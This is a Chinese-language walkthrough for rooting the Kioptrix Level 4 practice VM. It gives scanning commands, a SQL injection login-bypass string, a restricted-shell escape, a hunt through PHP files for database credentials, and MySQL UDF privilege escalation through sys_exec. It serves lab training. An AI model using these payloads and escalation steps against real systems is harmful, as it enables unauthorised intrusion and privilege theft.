攻破 kioprix level 4 靶机

又又又来了...

法一、

基本步骤

1.确认主机ip，扫描端口确定服务和版本

2.访问网站，扫描目录，查找敏感信息

3.利用敏感信息和SQL注入进入网站

4.ssh服务连接主机

5.shell逃逸并查找敏感信息（与数据库等相关）

6.mysql提权

arp-scan -l

nmap -sS -p- -sV -T4 192.168.5.133

dirsearch -u http://192.168.5.133

curl 192.168.5.133

尝试弱口令、万能密码

burp 尝试用户名+密码爆破

没成功，以后要再整理一下字典

根据之前的目录扫描，挖掘信息

能看出来这里创建了 members 表，并写入了 john 的用户数据

以 john 1234 登录

不正确？可能他改了密码？

但可以确定 john 一定存在，先尝试万能密码

1' or '1'='1

下一步横向移动？怎么到后台去呢？

结合之前扫描的 22端口ssh服务，尝试以他的用户名密码进行连接

ssh john@192.168.5.133

连接后发现是低权限用户，且是受限制的shell

参考 渗透技巧——如何逃逸Linux的受限制shell执行任意命令_网易订阅进行shell逃逸

echo os.system('/bin/bash')

 根据该站点的登录情况，应该是开启了mysql服务，查看进程

ps -ef | grep mysql

 且端口为 3306

该网站采用php，搜索php敏感文件查找信息，最好能翻到mysql的账号密码

find / -name "*.php" 2>/dev/null

cat /var/www/rebert/robert.php

尝试一番后找到账号密码，登录

结合linux环境下的MySQL UDF提权_mysql udf提权 linux-CSDN博客对当前john进行提权

mysql -uroot -p

1

查看udf表

select * from mysql.func;

利用sys_exec将john添加到管理员组

select sys_exec('usermod -a -G admin john;);

exit； 退出数据库，sudo su 重登 john，提权成功。

总结

利用信息收集和sql注入获取到john信息，ssh连接，shell逃逸执行命令，查找php文件获取mysql账户密码，利用数据库的UDF提权方式以及sys_exec函数将john账户添加到root组中。

法二、

补充说明

Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret